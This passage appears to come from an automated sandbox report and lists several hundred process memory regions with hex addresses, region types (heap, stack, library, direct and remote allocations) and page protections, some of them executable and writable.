||
|
700E000
|
remote allocation
|
page execute and read and write
|
||
|
18D0000
|
unkown
|
page readonly
|
||
|
825F000
|
heap
|
page read and write
|
||
|
B30000
|
heap
|
page read and write
|
||
|
6D5A3FE000
|
stack
|
page read and write
|
||
|
1EF2930C000
|
trusted library allocation
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
34A3000
|
heap
|
page read and write
|
||
|
77ED000
|
stack
|
page read and write
|
||
|
23C0000
|
heap
|
page read and write
|
||
|
7880000
|
trusted library allocation
|
page read and write
|
||
|
22CC0CBC000
|
heap
|
page read and write
|
||
|
243DC000
|
stack
|
page read and write
|
||
|
7FFD349C0000
|
trusted library allocation
|
page read and write
|
||
|
1EF2984D000
|
trusted library allocation
|
page read and write
|
||
|
24939000
|
direct allocation
|
page execute and read and write
|
||
|
1270000
|
heap
|
page read and write
|
||
|
2EF8000
|
stack
|
page read and write
|
||
|
22CC0AAE000
|
heap
|
page read and write
|
||
|
1EF4153E000
|
heap
|
page read and write
|
||
|
8A70000
|
heap
|
page read and write
|
||
|
22CC0BDB000
|
heap
|
page read and write
|
||
|
22CC0CF3000
|
heap
|
page read and write
|
||
|
2F90000
|
direct allocation
|
page read and write
|
||
|
22CC0BF8000
|
heap
|
page read and write
|
||
|
3019000
|
trusted library allocation
|
page read and write
|
||
|
6D5B9CB000
|
stack
|
page read and write
|
||
|
FA0000
|
unkown
|
page readonly
|
||
|
22CC0C81000
|
heap
|
page read and write
|
||
|
353F000
|
stack
|
page read and write
|
||
|
2ED0000
|
unkown
|
page execute and read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
22CC0E71000
|
heap
|
page read and write
|
||
|
8860000
|
trusted library allocation
|
page read and write
|
||
|
22CC0BF8000
|
heap
|
page read and write
|
||
|
3AA7000
|
unkown
|
page execute and read and write
|
||
|
73F0000
|
trusted library allocation
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
893F000
|
stack
|
page read and write
|
||
|
22CC0A92000
|
heap
|
page read and write
|
||
|
5C0E000
|
remote allocation
|
page execute and read and write
|
||
|
3070000
|
heap
|
page readonly
|
||
|
2F75000
|
heap
|
page read and write
|
||
|
83C5000
|
trusted library allocation
|
page read and write
|
||
|
34E8000
|
heap
|
page read and write
|
||
|
3D1C000
|
unclassified section
|
page read and write
|
||
|
3A4E000
|
direct allocation
|
page execute and read and write
|
||
|
13F4000
|
heap
|
page read and write
|
||
|
8956000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
22CC1110000
|
heap
|
page read and write
|
||
|
245D0000
|
heap
|
page read and write
|
||
|
14B0000
|
unkown
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
22CC0C12000
|
heap
|
page read and write
|
||
|
22CC0AEC000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
323E000
|
stack
|
page read and write
|
||
|
22CC0C25000
|
heap
|
page read and write
|
||
|
22CC1014000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
22CC0C7C000
|
heap
|
page read and write
|
||
|
22CC0BCC000
|
heap
|
page read and write
|
||
|
1EF41530000
|
heap
|
page read and write
|
||
|
87F0000
|
heap
|
page read and write
|
||
|
3004000
|
trusted library allocation
|
page read and write
|
||
|
1EF29869000
|
trusted library allocation
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
8290000
|
trusted library allocation
|
page execute and read and write
|
||
|
24810000
|
direct allocation
|
page execute and read and write
|
||
|
3294000
|
heap
|
page read and write
|
||
|
1EF414A0000
|
heap
|
page read and write
|
||
|
510E000
|
stack
|
page read and write
|
||
|
22CC0C24000
|
heap
|
page read and write
|
||
|
1EF28C10000
|
trusted library allocation
|
page read and write
|
||
|
22CC0A83000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
2431D000
|
stack
|
page read and write
|
||
|
2C3F000
|
unkown
|
page read and write
|
||
|
22CC0BF8000
|
heap
|
page read and write
|
||
|
594E000
|
stack
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
1EF28C80000
|
trusted library allocation
|
page read and write
|
||
|
8973000
|
heap
|
page read and write
|
||
|
7FFD348C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
22CC0F53000
|
heap
|
page read and write
|
||
|
FA0000
|
unkown
|
page readonly
|
||
|
7FFD34A90000
|
trusted library allocation
|
page read and write
|
||
|
5E5000
|
unkown
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
37C4000
|
unkown
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
D70000
|
unkown
|
page readonly
|
||
|
DE1000
|
unkown
|
page readonly
|
||
|
22CBECD1000
|
heap
|
page read and write
|
||
|
22CC0CB4000
|
heap
|
page read and write
|
||
|
24ADD000
|
direct allocation
|
page execute and read and write
|
||
|
23E40000
|
heap
|
page read and write
|
||
|
7FFD34AF0000
|
trusted library allocation
|
page read and write
|
||
|
22CBECAE000
|
heap
|
page read and write
|
||
|
22CC0C0D000
|
heap
|
page read and write
|
||
|
D3E000
|
stack
|
page read and write
|
||
|
23F0E000
|
stack
|
page read and write
|
||
|
1EF413B8000
|
heap
|
page read and write
|
||
|
22CC0C49000
|
heap
|
page read and write
|
||
|
22CC0E70000
|
heap
|
page read and write
|
||
|
7680000
|
trusted library allocation
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
123A000
|
stack
|
page read and write
|
||
|
1EF292EE000
|
trusted library allocation
|
page read and write
|
||
|
1EF2AE12000
|
trusted library allocation
|
page read and write
|
||
|
6D5B94D000
|
stack
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
AEE000
|
stack
|
page read and write
|
||
|
2ED5000
|
heap
|
page read and write
|
||
|
22CC0C4F000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
7FFD34860000
|
trusted library allocation
|
page execute and read and write
|
||
|
22CC0D39000
|
heap
|
page read and write
|
||
|
2428E000
|
stack
|
page read and write
|
||
|
22CC0D06000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
1EF28C40000
|
heap
|
page read and write
|
||
|
23A80000
|
direct allocation
|
page read and write
|
||
|
7FFD347FC000
|
trusted library allocation
|
page execute and read and write
|
||
|
38B0000
|
direct allocation
|
page execute and read and write
|
||
|
6D5A97E000
|
stack
|
page read and write
|
||
|
CB0000
|
unkown
|
page readonly
|
||
|
22CC0EBD000
|
heap
|
page read and write
|
||
|
309B000
|
heap
|
page read and write
|
||
|
3408000
|
heap
|
page read and write
|
||
|
6D5A9FE000
|
stack
|
page read and write
|
||
|
3310000
|
heap
|
page read and write
|
||
|
82D2000
|
heap
|
page read and write
|
||
|
3102000
|
unkown
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
22CC0BE1000
|
heap
|
page read and write
|
||
|
22CC0ABB000
|
heap
|
page read and write
|
||
|
A90000
|
heap
|
page read and write
|
||
|
3540000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
897E000
|
stack
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
34CD000
|
heap
|
page read and write
|
||
|
22CC0CEE000
|
heap
|
page read and write
|
||
|
3059000
|
heap
|
page read and write
|
||
|
1EF272A0000
|
heap
|
page read and write
|
||
|
8973000
|
heap
|
page read and write
|
||
|
1EF4150A000
|
heap
|
page read and write
|
||
|
22CC0F26000
|
heap
|
page read and write
|
||
|
48A5000
|
heap
|
page execute and read and write
|
||
|
1EF28C50000
|
trusted library allocation
|
page read and write
|
||
|
2E90000
|
trusted library section
|
page read and write
|
||
|
2EBB000
|
stack
|
page read and write
|
||
|
115D000
|
unkown
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
73AE000
|
stack
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
1340000
|
unkown
|
page readonly
|
||
|
5D1000
|
unkown
|
page execute read
|
||
|
3541000
|
heap
|
page read and write
|
||
|
22CC0CA4000
|
heap
|
page read and write
|
||
|
22CC0F27000
|
heap
|
page read and write
|
||
|
1350000
|
unkown
|
page readonly
|
||
|
7FFD349D0000
|
trusted library allocation
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
22CC0B0F000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
22CC0BD1000
|
heap
|
page read and write
|
||
|
22CC0CC1000
|
heap
|
page read and write
|
||
|
480E000
|
remote allocation
|
page execute and read and write
|
||
|
7FFD347A2000
|
trusted library allocation
|
page read and write
|
||
|
22CC0D27000
|
heap
|
page read and write
|
||
|
7178000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
5089000
|
stack
|
page read and write
|
||
|
22CC0E12000
|
heap
|
page read and write
|
||
|
22CC0BD0000
|
heap
|
page read and write
|
||
|
88C0000
|
direct allocation
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
7FFD3495A000
|
trusted library allocation
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
14B0000
|
unkown
|
page read and write
|
||
|
22CC1188000
|
heap
|
page read and write
|
||
|
7FFD34886000
|
trusted library allocation
|
page execute and read and write
|
||
|
23A90000
|
direct allocation
|
page read and write
|
||
|
1448000
|
heap
|
page read and write
|
||
|
22CC0D39000
|
heap
|
page read and write
|
||
|
8935000
|
heap
|
page read and write
|
||
|
23A70000
|
direct allocation
|
page read and write
|
||
|
22CC0D39000
|
heap
|
page read and write
|
||
|
22CC0C12000
|
heap
|
page read and write
|
||
|
E24E000
|
direct allocation
|
page execute and read and write
|
||
|
22CBECCA000
|
heap
|
page read and write
|
||
|
8A7D000
|
heap
|
page read and write
|
||
|
7FFD349A0000
|
trusted library allocation
|
page read and write
|
||
|
3BF2000
|
direct allocation
|
page execute and read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
14F0000
|
heap
|
page read and write
|
||
|
9CA34FE000
|
stack
|
page read and write
|
||
|
883D000
|
stack
|
page read and write
|
||
|
22CC0C89000
|
heap
|
page read and write
|
||
|
22CC0AC3000
|
heap
|
page read and write
|
||
|
8281000
|
heap
|
page read and write
|
||
|
190000
|
heap
|
page read and write
|
||
|
1440000
|
heap
|
page read and write
|
||
|
22CC0A7F000
|
heap
|
page read and write
|
||
|
2C80000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
5A8E000
|
stack
|
page read and write
|
||
|
7FFD34AD0000
|
trusted library allocation
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
88A0000
|
heap
|
page readonly
|
||
|
82B1000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
7FFD34B20000
|
trusted library allocation
|
page read and write
|
||
|
8880000
|
trusted library allocation
|
page read and write
|
||
|
E9E000
|
stack
|
page read and write
|
||
|
5D1000
|
unkown
|
page execute read
|
||
|
7FFD34970000
|
trusted library allocation
|
page execute and read and write
|
||
|
524E000
|
stack
|
page read and write
|
||
|
88B0000
|
heap
|
page read and write
|
||
|
8B00000
|
heap
|
page read and write
|
||
|
22CC0BFE000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
493C000
|
stack
|
page read and write
|
||
|
8283000
|
heap
|
page read and write
|
||
|
261A5000
|
unclassified section
|
page execute and read and write
|
||
|
7400000
|
heap
|
page read and write
|
||
|
6D5A87C000
|
stack
|
page read and write
|
||
|
2FD4000
|
heap
|
page read and write
|
||
|
3280000
|
heap
|
page read and write
|
||
|
32DDE9C000
|
stack
|
page read and write
|
||
|
22CC0C12000
|
heap
|
page read and write
|
||
|
1CEEC0F8000
|
heap
|
page read and write
|
||
|
1EF28DC0000
|
heap
|
page read and write
|
||
|
4980000
|
trusted library allocation
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
22CC0A73000
|
heap
|
page read and write
|
||
|
23AE0000
|
direct allocation
|
page read and write
|
||
|
7FFD347A3000
|
trusted library allocation
|
page execute and read and write
|
||
|
22CC0BCC000
|
heap
|
page read and write
|
||
|
843C000
|
stack
|
page read and write
|
||
|
F90000
|
unkown
|
page readonly
|
||
|
32DDF9F000
|
stack
|
page read and write
|
||
|
487E000
|
stack
|
page read and write
|
||
|
1EF273C3000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
22CC0EBD000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
7FFD34982000
|
trusted library allocation
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
3200000
|
direct allocation
|
page read and write
|
||
|
33DC000
|
unkown
|
page read and write
|
||
|
54DC000
|
stack
|
page read and write
|
||
|
DA7000
|
heap
|
page read and write
|
||
|
22CC0ED8000
|
heap
|
page read and write
|
||
|
34E0000
|
heap
|
page read and write
|
||
|
1EF273FF000
|
heap
|
page read and write
|
||
|
504B000
|
stack
|
page read and write
|
||
|
1EF2AFE5000
|
trusted library allocation
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
24240000
|
direct allocation
|
page read and write
|
||
|
48B0000
|
heap
|
page execute and read and write
|
||
|
22CC0C3B000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
7432000
|
heap
|
page read and write
|
||
|
82A0000
|
trusted library allocation
|
page read and write
|
||
|
22CC0E75000
|
heap
|
page read and write
|
||
|
8277000
|
stack
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
511F000
|
stack
|
page read and write
|
||
|
22CC1017000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
23BE000
|
stack
|
page read and write
|
||
|
22CC0EB8000
|
heap
|
page read and write
|
||
|
5E5000
|
unkown
|
page read and write
|
||
|
D60000
|
unkown
|
page readonly
|
||
|
3541000
|
heap
|
page read and write
|
||
|
22CC0EFC000
|
heap
|
page read and write
|
||
|
8934000
|
heap
|
page read and write
|
||
|
22CBED90000
|
remote allocation
|
page read and write
|
||
|
1EF2ADCB000
|
trusted library allocation
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
1648000
|
heap
|
page read and write
|
||
|
3102000
|
unkown
|
page read and write
|
||
|
22CC0BF8000
|
heap
|
page read and write
|
||
|
4B20000
|
heap
|
page read and write
|
||
|
22CC0BD0000
|
heap
|
page read and write
|
||
|
22CBEC2E000
|
heap
|
page read and write
|
||
|
2493D000
|
direct allocation
|
page execute and read and write
|
||
|
49A0000
|
heap
|
page read and write
|
||
|
341A000
|
heap
|
page read and write
|
||
|
F80000
|
unkown
|
page readonly
|
||
|
3541000
|
heap
|
page read and write
|
||
|
8262000
|
heap
|
page read and write
|
||
|
D60000
|
heap
|
page read and write
|
||
|
340B000
|
heap
|
page read and write
|
||
|
82F3000
|
heap
|
page read and write
|
||
|
22CC0AA3000
|
heap
|
page read and write
|
||
|
23A30000
|
direct allocation
|
page read and write
|
||
|
6E6E000
|
stack
|
page read and write
|
||
|
2445E000
|
stack
|
page read and write
|
||
|
23AC0000
|
direct allocation
|
page read and write
|
||
|
22CBEDB0000
|
heap
|
page read and write
|
||
|
82D8000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
22CC0EBD000
|
heap
|
page read and write
|
||
|
22CC0D31000
|
heap
|
page read and write
|
||
|
7820000
|
trusted library allocation
|
page read and write
|
||
|
C50000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
3640000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
1EF390CA000
|
trusted library allocation
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
22CC0E77000
|
heap
|
page read and write
|
||
|
22CC0BFE000
|
heap
|
page read and write
|
||
|
22CC0C29000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
D50000
|
heap
|
page read and write
|
||
|
23A20000
|
direct allocation
|
page read and write
|
||
|
24230000
|
direct allocation
|
page read and write
|
||
|
6D5AE7B000
|
stack
|
page read and write
|
||
|
22CC0CE6000
|
heap
|
page read and write
|
||
|
1EF28D90000
|
heap
|
page execute and read and write
|
||
|
304F000
|
stack
|
page read and write
|
||
|
6D5A6FD000
|
stack
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
82B6000
|
heap
|
page read and write
|
||
|
23A10000
|
direct allocation
|
page read and write
|
||
|
1EF41227000
|
heap
|
page read and write
|
||
|
22CC0C53000
|
heap
|
page read and write
|
||
|
BA4E000
|
direct allocation
|
page execute and read and write
|
||
|
559F000
|
stack
|
page read and write
|
||
|
2EE0000
|
unkown
|
page readonly
|
||
|
26EC000
|
heap
|
page read and write
|
||
|
2B30000
|
heap
|
page read and write
|
||
|
7640000
|
trusted library allocation
|
page execute and read and write
|
||
|
22CC0B0F000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
5E5000
|
unkown
|
page read and write
|
||
|
22CC0E10000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
7FFD34A20000
|
trusted library allocation
|
page read and write
|
||
|
849C000
|
stack
|
page read and write
|
||
|
83D0000
|
trusted library allocation
|
page read and write
|
||
|
3318000
|
heap
|
page read and write
|
||
|
1578000
|
system
|
page execute and read and write
|
||
|
2A10000
|
heap
|
page read and write
|
||
|
22CC0D39000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
DA4000
|
heap
|
page read and write
|
||
|
22CC0BE1000
|
heap
|
page read and write
|
||
|
2441C000
|
stack
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
2FF0000
|
trusted library allocation
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
22CC0C22000
|
heap
|
page read and write
|
||
|
1640000
|
heap
|
page read and write
|
||
|
22CC0C84000
|
heap
|
page read and write
|
||
|
32CE000
|
stack
|
page read and write
|
||
|
22CC0B0F000
|
heap
|
page read and write
|
||
|
9C4E000
|
direct allocation
|
page execute and read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
48A0000
|
heap
|
page execute and read and write
|
||
|
1568000
|
system
|
page execute and read and write
|
||
|
4515000
|
unkown
|
page execute and read and write
|
||
|
861B000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
1EF2ADB6000
|
trusted library allocation
|
page read and write
|
||
|
22CC0A7E000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
6D5ACFE000
|
stack
|
page read and write
|
||
|
891B000
|
heap
|
page read and write
|
||
|
22CC0CB1000
|
heap
|
page read and write
|
||
|
22CC0C3E000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
2FD4000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
3545000
|
heap
|
page read and write
|
||
|
1EF2946F000
|
trusted library allocation
|
page read and write
|
||
|
9AD000
|
stack
|
page read and write
|
||
|
7532000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
1EF2985F000
|
trusted library allocation
|
page read and write
|
||
|
22CC0ADB000
|
heap
|
page read and write
|
||
|
22CC0AA6000
|
heap
|
page read and write
|
||
|
36E0000
|
trusted library allocation
|
page read and write
|
||
|
49B1000
|
trusted library allocation
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
24788000
|
heap
|
page read and write
|
||
|
23AD0000
|
direct allocation
|
page read and write
|
||
|
830D000
|
heap
|
page read and write
|
||
|
22CC0C34000
|
heap
|
page read and write
|
||
|
590C000
|
stack
|
page read and write
|
||
|
1EF41230000
|
heap
|
page read and write
|
||
|
8307000
|
heap
|
page read and write
|
||
|
7FFD34B10000
|
trusted library allocation
|
page read and write
|
||
|
321C000
|
unkown
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
341F000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
30F0000
|
unkown
|
page read and write
|
||
|
22CC0C79000
|
heap
|
page read and write
|
||
|
231D000
|
stack
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
22CC0F77000
|
heap
|
page read and write
|
||
|
1B4C5A00000
|
heap
|
page read and write
|
||
|
22CC0E12000
|
heap
|
page read and write
|
||
|
24210000
|
direct allocation
|
page read and write
|
||
|
7FFD34A80000
|
trusted library allocation
|
page read and write
|
||
|
53FF000
|
trusted library allocation
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
1CEEC070000
|
heap
|
page read and write
|
||
|
74D6000
|
heap
|
page read and write
|
||
|
896B000
|
heap
|
page read and write
|
||
|
133C000
|
stack
|
page read and write
|
||
|
7FFD347B0000
|
trusted library allocation
|
page read and write
|
||
|
50CD000
|
stack
|
page read and write
|
||
|
29DF000
|
stack
|
page read and write
|
||
|
1EF41238000
|
heap
|
page read and write
|
||
|
22CC0AEB000
|
heap
|
page read and write
|
||
|
22CC0BFD000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
22CC0A93000
|
heap
|
page read and write
|
||
|
D1A000
|
stack
|
page read and write
|
||
|
3035000
|
trusted library allocation
|
page execute and read and write
|
||
|
9CA37FB000
|
stack
|
page read and write
|
||
|
10FC000
|
stack
|
page read and write
|
||
|
4A14000
|
trusted library allocation
|
page read and write
|
||
|
6A7E000
|
stack
|
page read and write
|
||
|
88FE000
|
stack
|
page read and write
|
||
|
22CC0AE3000
|
heap
|
page read and write
|
||
|
6D5A8FE000
|
stack
|
page read and write
|
||
|
22CC0F53000
|
heap
|
page read and write
|
||
|
3CC2000
|
unclassified section
|
page read and write
|
||
|
25737000
|
unclassified section
|
page execute and read and write
|
||
|
22CC0AC0000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
23F4D000
|
stack
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
22CC0B70000
|
heap
|
page read and write
|
||
|
3414000
|
heap
|
page read and write
|
||
|
76E0000
|
heap
|
page execute and read and write
|
||
|
22CC0C0D000
|
heap
|
page read and write
|
||
|
22CC0AAB000
|
heap
|
page read and write
|
||
|
897C000
|
heap
|
page read and write
|
||
|
2CD8000
|
heap
|
page read and write
|
||
|
330F000
|
stack
|
page read and write
|
||
|
14A1000
|
unkown
|
page readonly
|
||
|
23A60000
|
direct allocation
|
page read and write
|
||
|
3003000
|
trusted library allocation
|
page execute and read and write
|
||
|
1360000
|
unkown
|
page readonly
|
||
|
7890000
|
trusted library allocation
|
page read and write
|
||
|
22CC0AA6000
|
heap
|
page read and write
|
||
|
3380000
|
heap
|
page read and write
|
||
|
88F8000
|
heap
|
page read and write
|
||
|
84B0000
|
heap
|
page read and write
|
||
|
22CC0CA1000
|
heap
|
page read and write
|
||
|
22CC0C70000
|
heap
|
page read and write
|
||
|
78EB000
|
stack
|
page read and write
|
||
|
33DC000
|
unkown
|
page read and write
|
||
|
AC5E0FF000
|
unkown
|
page read and write
|
||
|
22CC0D39000
|
heap
|
page read and write
|
||
|
1B4C5CB0000
|
heap
|
page read and write
|
||
|
7830000
|
trusted library allocation
|
page read and write
|
||
|
7650000
|
trusted library allocation
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
22CC0C43000
|
heap
|
page read and write
|
||
|
7A0E000
|
remote allocation
|
page execute and read and write
|
||
|
22CC0AC6000
|
heap
|
page read and write
|
||
|
3280000
|
heap
|
page read and write
|
||
|
22CC1188000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
22CC0C9C000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
22CC0BB9000
|
heap
|
page read and write
|
||
|
8380000
|
trusted library allocation
|
page read and write
|
||
|
5D0000
|
unkown
|
page readonly
|
||
|
22CC0BD1000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
22CC0BF8000
|
heap
|
page read and write
|
||
|
247F9000
|
heap
|
page read and write
|
||
|
1EF2AE16000
|
trusted library allocation
|
page read and write
|
||
|
22CC0B00000
|
heap
|
page read and write
|
||
|
6DEE000
|
stack
|
page read and write
|
||
|
555E000
|
stack
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
1EF41220000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
5A19000
|
trusted library allocation
|
page read and write
|
||
|
2412E000
|
stack
|
page read and write
|
||
|
22CC0B08000
|
heap
|
page read and write
|
||
|
3032000
|
trusted library allocation
|
page read and write
|
||
|
C90000
|
unkown
|
page readonly
|
||
|
22CC0C99000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
22CC0CB9000
|
heap
|
page read and write
|
||
|
22CC0CDB000
|
heap
|
page read and write
|
||
|
6D5B8CE000
|
stack
|
page read and write
|
||
|
1490000
|
unkown
|
page read and write
|
||
|
D70000
|
unkown
|
page readonly
|
||
|
22CBEBA0000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
22CC0A99000
|
heap
|
page read and write
|
||
|
4C5E000
|
stack
|
page read and write
|
||
|
22CC0EBD000
|
heap
|
page read and write
|
||
|
8A0E000
|
stack
|
page read and write
|
||
|
22CC1471000
|
heap
|
page read and write
|
||
|
22CC0B05000
|
heap
|
page read and write
|
||
|
22CC1071000
|
heap
|
page read and write
|
||
|
8982000
|
heap
|
page read and write
|
||
|
22CBEC96000
|
heap
|
page read and write
|
||
|
22CBEDB5000
|
heap
|
page read and write
|
||
|
22CC0E73000
|
heap
|
page read and write
|
||
|
23AA0000
|
direct allocation
|
page read and write
|
||
|
A80000
|
heap
|
page read and write
|
||
|
896B000
|
heap
|
page read and write
|
||
|
1B4C5CB5000
|
heap
|
page read and write
|
||
|
1250000
|
unkown
|
page read and write
|
||
|
22CC0CEB000
|
heap
|
page read and write
|
||
|
D7F000
|
stack
|
page read and write
|
||
|
2CD0000
|
heap
|
page read and write
|
||
|
22CC0D17000
|
heap
|
page read and write
|
||
|
5DE000
|
unkown
|
page readonly
|
||
|
1B4C5A0A000
|
heap
|
page read and write
|
||
|
7FFD347BB000
|
trusted library allocation
|
page read and write
|
||
|
7840000
|
trusted library allocation
|
page read and write
|
||
|
1EF27401000
|
heap
|
page read and write
|
||
|
8966000
|
heap
|
page read and write
|
||
|
22CC0E12000
|
heap
|
page read and write
|
||
|
7FFD3485C000
|
trusted library allocation
|
page execute and read and write
|
||
|
1540000
|
unkown
|
page readonly
|
||
|
22CC0AE6000
|
heap
|
page read and write
|
||
|
85DC000
|
stack
|
page read and write
|
||
|
3420000
|
heap
|
page read and write
|
||
|
776F000
|
stack
|
page read and write
|
||
|
340F000
|
heap
|
page read and write
|
||
|
22CC0BB1000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
1640000
|
heap
|
page read and write
|
||
|
257A5000
|
unclassified section
|
page execute and read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
133C000
|
stack
|
page read and write
|
||
|
22CC0C12000
|
heap
|
page read and write
|
||
|
22CC1470000
|
heap
|
page read and write
|
||
|
1B4C5B10000
|
heap
|
page read and write
|
||
|
1EF273BF000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
2BC0000
|
heap
|
page read and write
|
||
|
1EF29352000
|
trusted library allocation
|
page read and write
|
||
|
8294000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
1EF293D8000
|
trusted library allocation
|
page read and write
|
||
|
88BF000
|
stack
|
page read and write
|
||
|
22CC0C94000
|
heap
|
page read and write
|
||
|
5C5D000
|
trusted library allocation
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
22CBECB1000
|
heap
|
page read and write
|
||
|
2DE0000
|
unkown
|
page readonly
|
||
|
88D0000
|
direct allocation
|
page read and write
|
||
|
2FA0000
|
heap
|
page read and write
|
||
|
3400000
|
heap
|
page read and write
|
||
|
1EF296EB000
|
trusted library allocation
|
page read and write
|
||
|
22CC0A8E000
|
heap
|
page read and write
|
||
|
1B4C5CC0000
|
heap
|
page read and write
|
||
|
22CC0E91000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
7860000
|
trusted library allocation
|
page read and write
|
||
|
22CC0BC0000
|
heap
|
page read and write
|
||
|
1EF412EA000
|
heap
|
page read and write
|
||
|
1B4C5CB4000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
CC9000
|
stack
|
page read and write
|
||
|
B38000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
7FFD34A10000
|
trusted library allocation
|
page read and write
|
||
|
6F60000
|
direct allocation
|
page read and write
|
||
|
22CC0A96000
|
heap
|
page read and write
|
||
|
3361000
|
heap
|
page read and write
|
||
|
22CC0BC0000
|
heap
|
page read and write
|
||
|
5DE000
|
unkown
|
page readonly
|
||
|
22CC0D03000
|
heap
|
page read and write
|
||
|
3820000
|
trusted library allocation
|
page read and write
|
||
|
